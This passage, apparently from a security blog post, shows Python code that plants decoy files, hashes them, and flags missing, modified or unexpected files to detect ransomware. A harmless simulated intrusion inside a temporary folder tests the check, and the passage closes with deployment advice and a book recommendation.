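        if not os.path.exists(path):
            tripped.append((path, "missing"))
            continue
        with open(path, "rb") as fh:
            if hashlib.sha256(fh.read()).hexdigest() != digest:
                tripped.append((path, "modified"))
    for share_dir in {os.path.dirname(p) for p in baseline}:
        for name in sorted(os.listdir(share_dir)):
            path = os.path.join(share_dir, name)
            if path not in baseline:
                tripped.append((path, "unexpected file"))
    return tripped


def simulate_ransomware(baseline):
    """Stand-in for an intrusion: overwrite one decoy and drop a ransom note."""
    victim = sorted(baseline)[0]
    with open(victim, "wb") as fh:
        fh.write(b"not really encrypted, but no longer the original bytes")
    note = os.path.join(os.path.dirname(victim), "HOW_TO_RECOVER.txt")
    with open(note, "w") as fh:
        fh.write("pay us\n")
    return victim, note


def run_demo():
    """Plant, confirm quiet, simulate the attack, check again; return both results."""
    share = tempfile.mkdtemp(prefix="decoy-share-")
    baseline = plant_decoys(share)
    before = check_decoys(baseline)
    simulate_ransomware(baseline)
    after = check_decoys(baseline)
    return before, after


if __name__ == "__main__":
    quiet, tripped = run_demo()
    print("before:", quiet or "nothing tripped")
    for path, reason in tripped:
        print(f"after : {reason:15s} {os.path.basename(path)}")
```

In practice the check would run on a schedule or from a file-system watcher, the baseline would be kept off the share, and a trip would feed the SOC rather than a print statement; the hashing and listing logic stays the same.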

I look forward to hopefully taking a look at some methods that would be used to stall an attack as it happens, but will recommend a book to any security professional interested in the idea of a cyber-battlefield as it’s a brilliant read… Adversarial Tradecraft in Cybersecurity by Dan Borges.